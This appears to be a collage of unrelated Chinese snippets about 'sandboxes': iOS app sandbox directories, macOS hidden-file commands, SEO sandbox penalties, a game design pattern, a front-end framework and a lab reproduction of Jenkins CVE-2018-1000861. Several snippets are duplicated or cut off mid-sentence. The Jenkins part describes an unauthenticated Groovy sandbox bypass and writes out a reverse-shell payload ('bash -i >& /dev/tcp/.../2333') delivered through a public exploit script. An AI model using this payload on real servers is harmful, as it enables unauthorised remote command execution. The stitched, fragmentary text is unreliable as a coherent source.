沙盒

1、IOS沙盒机制 IOS应用程序只能在为该改程序创建的文件系统中读取文件，不可以去其它地方访问，此区域被成为沙盒，所以所有的非代码文件都要保存在此，例如图像，图标，声音，映像，属性列表，文本文件等。 1.1、每个应用程序都有自己的存储空间 1.2、应用程序不能翻过自己的围墙去访问别的存储空间的内容 1.3、应用程序请求的数据都要通过权限检测，假如不符合条件的话，不会被放行。 通过这张图只能从表层上理解sandbox是一种安全体系，应用程序的所有操作都要通过这个体系来执行，其中核心内容是：sandbox对应用程序执行各种操作的权限限制。 2、打开模拟器沙盒目录 下面看看模拟器的沙盒文件夹在mac电脑上的什么位置。 文件都在个人用户名文件夹下的一个隐藏文件夹里，中文叫资源库，他的目录其实是Library。 2.1 方法1、可以设置显示隐藏文件，然后在Finder下直接打开。设置查看隐藏文件的方法如下：打开终端，输入命名 显示Mac隐藏文件的命令：defaults write com.apple.finder AppleShowAllFiles -bool true 隐藏Mac隐藏文件的命令：defaults write com.apple.finder AppleShowAllFiles -bool false 输完单击Enter键，退出终端，

刚好群里有个朋友问到这个然后就复现了一下 1. 漏洞描述 Jenkins使用Stapler框架开发，其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制，攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞，我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令：Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误，检查操作是没有沙盒的，攻击者可以通过Meta-Programming的方式，在检查这个步骤时执行任意命令。 2.环境搭建 直接使用vulhub上的环境 (1) 下载vulhub项目,然后进入到 vulhub/jenkins/CVE-2018-1000861目录下 (2) 执行命令:docker-compose up -d (3)访问: http://192.168.222.143:8080/ 3.漏洞复现 此漏洞没有回显，直接利用orange的exp执行命令反弹shell orang的exp https://github.com/orangetw/awesome-jenkins-rce-2019 (1).在我们的web服务器写txt文本内容为： bash -i >& /dev/tcp/*.*.*.*/2333 0>&1 (2).使用exp.py执行以下命令下载文件

SandBox，沙盒机制，是一种安全体系。我们所开发的每一个应用程序在设备上会有一个对应的沙盒文件夹，当前的程序只能在自己的沙盒文件夹中读取文件，不能访问其他应用程序的沙盒。在项目中添加的所有非代码的资源，比如图片、声音、属性列表等都存在自己的沙盒中。此外，在程序运行中动态生成的或者从网络获取的数据，如果要存储，也都是存储到沙盒中。 沙盒中的默认文件夹 （1）Documents：苹果建议将程序中建立的或在程序中浏览到的文件数据保存在该目录下，iTunes备份和恢复的时候会包括此目录 （2）Library：存储程序的默认设置或其它状态信息； 里面又包含两个文件夹Caches和Preference； Caches，存放缓存文件，iTunes不会备份此目录 （3）tmp：提供一个即时创建临时文件的地方 获取沙盒中的不同目录 代码 // JRSandBoxPath.h // Fmdb // // Created by jerei on 15-10-30. // Copyright (c) 2015年 jerei. All rights reserved. // #import <Foundation/Foundation.h> @interface JRSandBoxPath: NSObject // 获取沙盒Document的文件目录 + (NSString *

1、iOS沙盒机制 iOS应用程序只能在为该改程序创建的文件系统中读取文件，不可以去其它地方访问，此区域被成为沙盒，所以所有的非代码文件都要保存在此，例如图像，图标，声音，映像，属性列表，文本文件等。 1.1、每个应用程序都有自己的存储空间 1.2、应用程序不能翻过自己的围墙去访问别的存储空间的内容 1.3、应用程序请求的数据都要通过权限检测，假如不符合条件的话，不会被放行。 通过这张图只能从表层上理解sandbox是一种安全体系，应用程序的所有操作都要通过这个体系来执行，其中核心内容是：sandbox对应用程序执行各种操作的权限限制。 2、打开模拟器沙盒目录 下面看看模拟器的沙盒文件夹在mac电脑上的什么位置。 文件都在个人用户名文件夹下的一个隐藏文件夹里，中文叫资源库，他的目录其实是Library。 2.1 方法1、 可以设置显示隐藏文件，然后在Finder下直接打开。设置查看隐藏文件的方法如下：打开终端，输入命名 显示Mac隐藏文件的命令：defaultswritecom.apple.finderAppleShowAllFiles-booltrue 隐藏Mac隐藏文件的命令：defaults write com.apple.finder AppleShowAllFiles -bool false 输完单击Enter键，退出终端，重新启动Finder就可以了 重启Finder

搜索引擎提交入口：将新网站提交收录 SEO优化三要素：标题 关键词 描述 外链（友情链接） 目的：提高权重 注意事项： 1、和内容相近的网站交换 2、链接交换形式多样 单向链接：别人指向我或我指向别人，而对方不指过来（有利于提高权重，因为进来以后不会再指出去） 双向链接：网站和网站之间相互交换链接 单向直链：站长请求和别人交换网站，别人指向自己的网站，而用自己较差的网站指向对方网站。 3、灌水式外链 在论坛灌水。论坛很头疼就直接屏蔽链接。 内链 内链就是页面中页面和页面的链接 搜索引擎在扒取页面的时候会顺着链接爬来爬去。 不仅可以提高本页面的阅读量（用户转化率），还可以提高下一个页面搜索引擎的抓取率。 内容质量 1、更新 2、文章质量 3、原创文章 4、关键词密度（2%-8%） 近年来搜索引擎的算法优化，不要耍小聪明，否则会带来负面作用。 黑帽和沙盒 1、购买网站（也有可能购买的网站链接质量较差，使自己的网站权重降低） 2、垃圾站 ：和垃圾站做友情链接，网站会被降权惩罚， 甚至不再被搜索引擎搜索到，也就是 被关进了沙盒。沙盒是谷歌反击垃圾站的措施。进了沙盒的网站相当于被关进了小黑屋，如果沙河期表现不好，可是以后不再被收录。 3、黑客行为 ：侵入他人的站点，在其他网站加入单向链接，而其他网站不能及时察觉。竞争性行为：一些黑帽购买一些肉鸡去攻击小网站

积累提供所有操作（的实现）来定义子类的行为 用一个最简单的例子来讲解这个模式 玩家操纵的英雄也就是这个游戏的主角会有许多技能，我们想定义许多不同的技能，来让玩家使用。 首 先我们定义一个skillBase类作为基类，我们所有技能的动作都在这里实现。我们可以从这些基本元动作中组合出各种各样的技能，甚至成百上千种，可以 设计一个doc文档来设计各种技能的操作，及操作顺序。这就是之所以为什么叫子类沙盒的原因，把实现技能的方法作为沙盒，向这个沙盒里加入各种各样的元动 作来组成各种各样的技能。 以传说系列的凤凰天驱为例，如下图（源自世界传说-换装迷宫2），这个技能分为，后移、跳跃、播放动画、前冲、粒子效果、播放动画等等元动作组成的 如果我们不使用子类沙盒模式，而一个一个写技能的话会有如下缺点： 1. 会产生大量重复代码，造成代码冗余，因为每个技能都有重复的地方，比如说播放声音，播放动画等。使用这种模式之后各个操作方法就像一个一个的组件一样，随意使用，不会有重复。 2. 每一个技能类都会与游戏系统和游戏引擎耦合，比如声音、动画播放，而如果把操作实现都写在基类里让子类组合的话就只有基类与之耦合而已。这个原因这种模 式带来的好处是，如果有某个操作增删改的话，就不用每个技能类都增删改一遍，而只改基类就好，方便简单，简约。而且重用性相当好，这些代码能用在大量游戏 上（比如说传说系列每个系列的传承-

iOS应用数据存储的方式 XML属性列表（plist）归档 preference（偏好设置） NSKeyedArchiver归档 SQLite3 Core Data 应用沙盒 每个iOS应用都有自己的应用沙盒（应用沙盒就是文件系统目录），与其他文件系统隔离。应用必须待在自己的沙盒里，其他应用不能访问该沙盒 应用沙盒结构分析 应用程序包：包含了所有的资源文件和可执行文件 Document：保存应用运行时生成的需要持久化的数据，iTunes同步设备时会备份该目录。例如，游戏应用可以将游戏存档保存在该目录。 tmp：保存应用运行时所需要的临时数据，使用完毕后再将相应的文件从该目录删除。应用没有运行时，系统也可能会清除该目录下的文件。iTunes同步设备时不会备份该目录。 Library/Caches：保存应用运行时生成的需要持久化的数据，iTunes同步设备时不会备份该目录。一般存储体积大、不需要备份的非重要数据 Library/Preference：保存应用的所有偏好设置，iOS的Settings（设置）应用会在该目录中查找应用的设置信息。iTunes同步设备时会备份该目录 应用沙盒目录的常见获取方式 1. tmp：NSString *tmp= NSTemporaryDirectory( ); 2. Library/Caches：（跟Document类似的有两种方法）

一、ios应用常用的数据存储方式 1.plist（XML属性列表归档） 2.偏好设置 3.NSKeydeArchiver归档（存储自定义对象） 4.SQLite3(数据库，关系型数据库，不能直接存储对象，要编写一些数据库的语句，将对象拆开存储) 5.Core Data（对象型的数据库，把内部环节屏蔽） 二、应用沙盒 每个iOS应用都有⾃己的应⽤沙盒(应用沙盒就是文件系统目录),与其他文件系统隔离。应⽤必须待在⾃己的沙盒里,其他应用不能访问该沙盒（提示：在IOS8中已经开放访问） 应⽤沙盒的文件系统⽬录,如下图所示(假设应用的名称叫Layer) 模拟器应⽤用沙盒的根路径在: (apple是⽤用户名, 7.0是模拟器版本) /Users/apple/Library/Application Support/iPhone Simulator/7.0/Applications 三、应用沙盒结构分析 应⽤程序包:(上图中的Layer)包含了所有的资源文件和可执行文件 Documents:保存应⽤运行时生成的需要持久化的数据,iTunes同步设备时会备份该目录。例如,游戏应用可将游戏存档保存在该目录 tmp:保存应⽤运行时所需的临时数据,使⽤完毕后再将相应的文件从该目录删除。应用没有运行时,系统也可能会清除该目录下的文件。iTunes同步设备时 不会备份该目录 Library/Caches

IOING 在做些什么？ IOING 在你的代码和浏览器之间架设了一个中间解释层，该解释层提供了一套新的语法来填补浏览器所不具备的能力。 SPA 开发痛点 开发一个 SPA 应用的痛点是不同模块页面的状态保存，当从一个页面跳转到另一个页面的时候窗口的所有状态都将被清空重载，历史页面与当前页面将不产生任何联系，这个过程是一个拆毁重建的过程，如果你要回到历史同样只能再次拆毁重建，并且在这个过程中不可避免的出现加载期的窗口白屏，显然这样的丑陋效果不符合一个高贵 App 的设定，但正因这种方式前后页面不共存的简单特性也使得开发逻辑变得简单，开发者只需考虑单个页面的逻辑即可，而每一次新页面的加载都能将之前页面进行完全释放，完全不需要担心高耦合和内存无法完全释放的问题，这也算是传统技术的优点，虽然简单粗暴，但是它很管用。那到底有没有两全其美的办法呢？ 传统模式带来的挑战 和 SPA 应用不同的是多页面应用往往相对要变得简单，页面与页面之间不需要有复杂的数据交换，也无需保存页面历史状态，因此使用传统技术最适合不过了。 而 SPA 应用则要协调页面间的关系，它的每一个模块都可能是联动的，而且需要保持窗口的数据状态，因而催生了另一个技术的流行，即通过使用 Ajax 和模版将新模块内容载入到当前页面，但这也导致新载入模块的脚本和 DOM 树内容在主文档下不断堆积，且在不需要时也无法将其很好移除和释放

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 新建一个demo项目 在 - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions 方法中调用如下代码 NSArray *documentDirectories = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,NSUserDomainMask,YES); NSString *documentDirectory = [documentDirectories firstObject]; NSLog(@"documentDirectory = %@",documentDirectory); 输出的路径，在finder中可以前往文件夹打开 可以看到如下的目录结构 Documents 目录是保存数据，备份或者同步也是这个目录 Library/Caches app产生的数据会保存在这里，用来记住每次运行的数据，但是不会被同步 Library/Preferences NSUserDefault类操作的数据 temp/ 不会备份，但是不需要的时候还是能清处理，NSTemporaryDirectory